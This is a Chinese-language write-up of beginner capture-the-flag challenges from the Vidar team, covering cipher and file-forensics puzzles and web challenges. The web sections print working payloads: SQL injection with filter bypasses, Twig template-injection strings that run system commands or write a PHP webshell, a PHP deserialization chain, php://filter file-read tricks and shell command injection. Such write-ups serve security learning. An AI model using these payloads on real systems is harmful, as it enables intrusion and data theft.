刚开学时 Vidar 的题目，我能做出来的几乎都会给出 wp ，个别太简单的就不放了
（虽然放上来的也都很简单，但是刚入门，不慌~~
涉及到的网址都是随机容器，不能访问

Misc

Ekrulila’s picture

题解

• 看题目描述，嘶，不知道是谁

• 两个hint
  • 看！哪有一排鸟再电线上欸
  • 或许可以试试英文搜索
• Google搜索bird on the wire cipher，发现一个网址
  • https://www.dcode.fr/birds-on-a-wire-cipher#:~:text=The encryption composed of birds represented as perched,from A to Z) according to the correspondence%3A
• 解码
  • HOWBEAUTIFULBIRDS
• 得flag
  • VIDAR{HOWBEAUTIFULBIRDS}

Weird suffix

题目描述

I have a big doubt about file extensions

题解

• 根据题目描述，与文件类型有关
• 下载附件，得到三个txt
• 打开查看，分别是png,jpg,bmp三种文件头
• 修改后缀
• 得到flag
  • VIDAR{FunNy_su4fix}

Hidden Zip

题目描述

010Editor may help you to find something strange！

Hint

Fence Code

题解

• 解压得到一张图片

• 根据题目描述，用010editor打开
• 查看结尾发现zip内容
• 修改文件后缀名，解压
• 打开发现是加密过的flag
• 为栅栏密码，得到flag
  • VIDAR{Wow~_Y0u_find_Me!}

Twisted figures

题目描述

Twisted png and get flag picture!

Hints

The results from OCR may need to be easily corrected by themselves.

题解

• 解压得到一张图片，被修改过长或宽

• 使用python编写脚本，通过CRC值爆破正常宽高

import binascii
import struct

misc = open("twisted_figures.png", "rb").read()

for i in range(1024):
    data = misc[12:16] + struct.pack('>i', i) + misc[20:29]
    crc32 = binascii.crc32(data) & 0xffffffff
    if crc32 == 0xCC64E9C9:
        print(i)
        print("hex:" + hex(i))

• 得到宽度应该为640，使用010进行修改得到正常图片
• 打开图片发现是一堆16进制文字，发现开头为504B0304，为png头
• 使用OCR转换文字，得到16进制数据
• 得flag
  • VIDAR{Ocr_c4n_b1_Us4fu1!}

Hard zip

题目描述

ek1ng admired E99p1ant, the senior of Vidar-Team who wrote cardinal, so he hid what he wanted to say to E99p1ant in the compressed package.

题解

• 下载附件，一个压缩包
• 弱口令：password，解压得到图片
• 010查看16进制数据，发现附加zip，得到四部分二维码，拼接扫码得到flag
  • VIDAR{U^kn0w_QRCode}

Adventure of the Dancing Men

题目描述

What one man can invent, another can discover.

Hints

• Base不只base64
• 题目采用的密码表：https://codepen.io/anie116/full/jdzvJK

题解

• 根据题目描述，发现与福尔摩斯小说的《跳舞的人》有关，下载附件

• 扫描得到一串莫斯密码
  • — …- – .– — -.– …– –. …. .. -..- … -…. –.. .-. … ..-. –.. ….- .– . -…. .-.. .– ..-. –.. –.- -..- . –.. –.. .–. –. .. -.– -.. . — .-. .–. –. .- ….- … -…. — .— … ..-. ….. .-. .– .. –.. .-.. — –. ….. .. …- –. -. -.-. -. .–. -… -… ..-. — …– -.. -… -. ..- -..- –. –. -.– .-.. ..-
• 解码得
  • OVTWOY3GHIXS6ZRSFZ4WE6LWFZQXEZZPGIYDEMRPGA4S6MJSF5RWIZLOG5IVGNCNPBBFO3DBNUXGGYLU
• base
  • uggcf://f2.ybyv.arg/2022/09/12/cden7QS4MxBWlam.cat
• 凯撒得到链接
  • https://s2.loli.net/2022/09/12/pqra7DF4ZkOJynz.png

• 得到图片，去网站解码得到flag
  • VIDAR{…AreSoFunnnnnnnnnnnnn}

Web

Do you really understand http

题目描述

ek1ng hid his secret on the page, but because he was afraid that he would forget where the secret was, he left a lot of tips. Can you find ek1ng's secret step by step according to the tips?

Hints

• 关于HTTP Header的知识看看看看这篇文章https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers

题解

• 根据提示，依次修改User-Agent,X-Forwarded-For,cookie: user=admin,在响应头发现flag
  • VIDAR{HTTP_1s^re4lly$1nteresting}

The Knife

题目描述

R1esbyfe hid his password on the website, but one day hackers hacked into his website and got his password, so R1esbyfe could only change his password and fix the website vulnerability. But did the hackers really leave no back door?

题解

• 打开网页，查看源代码，发现hint

• 扫描目录，访问back_door.php，蚁剑连接，翻目录得到flag
  • VIDAR{G5T_the_R1ghtdir!ANdH4cKTH3bacKdOOR_You_Get_The_rigH7Sh5LL!!!!}

Watch carefully

题目描述

Someone always calls Vidar as Vider? Get on the UFO and teach them a lesson! ! !

题解

• 观察源代码，上传格式为图片

• 上传一张图片抓包，发现具体参数，根据题目描述，修改参数

• 页面出现一些文字，猜测凯撒，此时resposne已经给出flag
  • VIDAR{W@tch CaRefu11y}

Get Post Universe

题目描述

One day, R1esbyfe wants to buy a GPU in an online shop, he need to transfer money to the card to buy it, but it seems a little diffcult for him, can you help him?

题解

• 根据题目描述，使用Get,Post两种请求方式
• Get: http://1-vidar-train-docker.η.cc:49520/?money=10000

• POST利用hackbar添加参数，也可以写脚本

• 得到flag
  • VIDAR{N0w_Y0u_hav5_LearNed_AB0u7_GET_4nD_POST!!!}

Book Management System

题目描述

ek1ng build a Book Management System in his website, everything seems ready, so that he can enter ID data to find book data, but it seems that somebody can also enter some other data?

题解

• 考察SQL注入，访问/books/1'

• 报错，添加注释-- (注意此处有空格)，此题过滤+，改用%20，报错消失

• 通过order by注入获取列数
  • http://1-vidar-train-docker.η.cc:49521/books/1’ order by {num}–%20

• 通过联合注入获取数据
  • http://1-vidar-train-docker.η.cc:49521/books/-1’ union select 1,database(),3 –%20
  • http://1-vidar-train-docker.η.cc:49521/books/-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘book’ –%20
  • http://1-vidar-train-docker.η.cc:49521/books/-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘book’ and table_name=‘secret’–%20
  • http://1-vidar-train-docker.η.cc:49521/books/-1’ union select 1,group_concat(fl4g),3 from book.secret–%20

备注：注入

• https://vidar-team.feishu.cn/docx/doxcnlBu6zBZWkzfRcX78hv8DNS

Book Management System V2

题目描述

After ek1ng’s book management system was hacked, he learned SQL injection and added filtering.Can you hack it?

题解

• 和上一个一样，先访问books/1'

• 尝试加上注释，让报错消失，发现过滤

• 改用#，url编码%23
• 继续流程，绕过过滤
  • order
  • union
  • select
  • database
• payload
  • 0’UNIon%20seLect%201,daTAbase(),3%23%20
  • 0’%20UNIon%20SElect%201,(sELEct%20group_concat(table_name)FrOm%20INFOrMATion_SCHEma.tables),3%23
  • 0’%20UNIon%20SElect%201,group_concat(COlUmn_naME),3%20FRom%
    20inFoRmAtion_sCHEma.coLUmns%20WHEre%20COlUmn_naMe%20lIkE%20’fllllllllllllllllllllllaaa444g’%23
  • 0’%20UNIon%20SElect%201,fllllllllllllllllllllllaaa444g,3%20FRom%20seeeeeeeeeeeeeeeecrret%23%20
• flag
  • VIDAR{U*Re4lly^Kn0wn_Sql$Inject1on}

Concat To Intranet

题目描述

There is a service that is not open to the outside world running on the intranet, but it seems that there is a vulnerability to access the intranet service?

题解

• 打开网页，存在一些参数，全部试一下

• 尝试/,/private2

• 出现flag字样，发现private2port变为10011

• 尝试访问/flag，存在网址拼接，修改端口号，打内网

• 访问1/flag，得到flag

Security Center

题目描述

Thousands of roads, safety first.

题目

• 打开网页，就两个跳转按钮

• 审查元素，发现hint

• 跳转至json，发现第三方模块的应用

• 其中存在twig模块，可能涉及ssti

• 测试漏洞点redirect.php?url={{7-5}}
• 网上找个payload

{{["id"]|map("system")|join(",")
{{["id", 0]|sort("system")|join(",")}}
{{["id"]|filter("system")|join(",")}}
{{[0, 0]|reduce("system", "id")|join(",")}}
{{{"<?php phpinfo();":"/var/www/html/shell.php"}|map("file_put_contents")}}

• 读取flag，存在过滤cat,VIDAR，绕过
  • VIDAR{U^K0nw_Tw1t&SSTii1iiii11111~!}

My Notebook

题目描述

I have created my notebook which was powered by the best language in the world!!!

题解

• 打开一个登陆

• 审计元素，得到hint

• 下载文件，得到源代码
• 在某个文件内发现关键代码

• 找到符合条件的值

s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469

• 又一个关键代码

function is_serialized($data):bool{
    $data = trim($data);
    if('N;' == $data)
        return true;
    if(!preg_match('/^([adObis]):/',$data,$options))
        return false;
    switch($options[1]){
        case 'a':
        case 'O':
        case 's':
            if(preg_match( "/^$options[1]:[0-9]+:.*[;}]\$/s", $data))
                return true;
            break;
        case 'b':
        case 'i':
        case 'd':
            if(preg_match("/^$options[1]:[0-9.E-]+;\$/",$data))
                return true;
            break;
    }
    return false;
}

• 此处用来匹配序列化字符串，考察pop链
• mainclass.php

• 分析

class GoGoGo() {} 中存在 __call()，它将会在调用不可调用的函数时被调用
class Evil() {} 中存在 __get()，它将会在调用不可调用的变量时被调用
发现
class HereWeGo() {} 中 __destruct()，中调用了不存在的 gogogo()
class GoGoGo() {} 中 __call()，中调用了不存在的变量 web

• 构造payload

<?php

// use HereWeGo as GlobalHereWeGo;

// use Evil as GlobalEvil;

error_reporting(0);
class HereWeGo{
    public $try;
    public function __destruct(){
        $this->try->gogogo();
    }
}

class GoGoGo{
    public $go;

    public function __construct($go)
    {
        $this->go = $go;
    }

    public function __call($name,$arguments){
        return $this->go->web;
    }
}

class Evil{
    public $file;
    public $final;

    public function __construct($file){
        $this->file = $file;
    }
    //The flag is in /flag
    public function __get($Attribute){
        $result = file_get_contents($this->file);
        if(preg_match('/vidar/i',$result)){
            $this->final = "HACKER!!!";
            file_put_contents('flag.txt',$this->final);
            return;
        }
        $this->final = $result;
        file_put_contents('flag.txt',$this->final);
    }
}
$c = new Evil('/flag');
$b = new GoGoGo($c);
$a = new HereWeGo();
$a -> try = $b;
echo serialize($a);

• 根据源代码得知运行结果被写入flag.txt，访问后发现

• 存在过滤结果vidar，用php伪协议绕过
  • php://filter/read=convert.base64-encode/resource=/flag
• 得到结果base64解码，得到flag
  • VIDAR{Php,BeAwAre0FUnS@vE_uNsEr1al1z5=o==o=}

补充

• sha1碰撞

sha1("aaroZmOk")
sha1("aaK1STfY")
sha1("aaO8zKZF")
sha1("aa3OFF9m")

Read something useful

题目描述

R1esbyfe’s emoji packs are full, so he put some of his favorite emoji packs on this website and plans to share them with his friends, he also hid a secret here, who is the first one to find the hidden secret?

题解

• 审计元素，发现注释

• file参数必须包含emoji
• 通过php伪协议绕过
  • php://filter/read=convert.base64-encode/write=emoji/resource=index
• 解码得到的内容

<html>
    <head>
        <meta charset="utf-8">
        <meta name="author" content="R1esbyfe">
        <meta name="keywords" content="Challenge10">
    </head>
        <body>
        <div style="text-align: center">
            <!-- try to read index.php first! -->
            <h4>Try to click the button to enjoy my emoji!!!</h4>
            <form action="index.php" method="get">
                <input type="hidden" name="file" id="file" value="emoji">
                <button type="submit">Click me</button>
                <!-- You may find it is a little difficult to read other files, right :( -->
                <!-- in index.php:

                    $file = $_GET['file'];
                    if(strpos($file, "emoji") !== false){
                    include($file.'.php');
                    }
              -->
            </form>
        </div>
        </body>
</html>

<?php

//try to read findme.php to find my secrets :D

error_reporting(0);
$file = $_GET['file'];

if(isset($file)){
    if(strpos($file, "emoji") !== false){
        include($file.'.php');
    }else{
        echo "<center>No,You need to find another way to find my secret :(</center>";
        return;
    }
}
?>

• 读取findme.php，发现需要传递新参数

<?php
 error_reporting(0);
 $flag = $_ENV['FLAG'];

 $lucky = $_GET['luckynumber'];

 if(isset($lucky)){
     if(is_numeric($lucky)){
         die("Not a number");
     }elseif($lucky == 777){
        echo "Congradulations, the flag is :".$flag;
    }
 }else{
    return;
 }

• 通过777%00绕过，得到flag
  • VIDAR{ReADMy_F1lE_inAFlexibleway__and_ExPl0it!MySEcret}

Fatal Command

题目描述

ek1ng, who just installed linux, found an interesting package called figlet, so he wrote an online font conversion site with figlet, but he seems to use a deadly function.

题解

• 访问，发现是一个工具figlet，考察命令注入

• 提示give up，可能是存在过滤，猜测空格过滤，经过尝试$IFS可以绕过过滤
  • test$IFS|ls$IFS…

• 过滤cat，tac绕过得到flag
  • VIDAR{C0mmand_1njection_1s^sO0O_inter3st1n5~!}

离谱的解法

• 将结果作为参数输出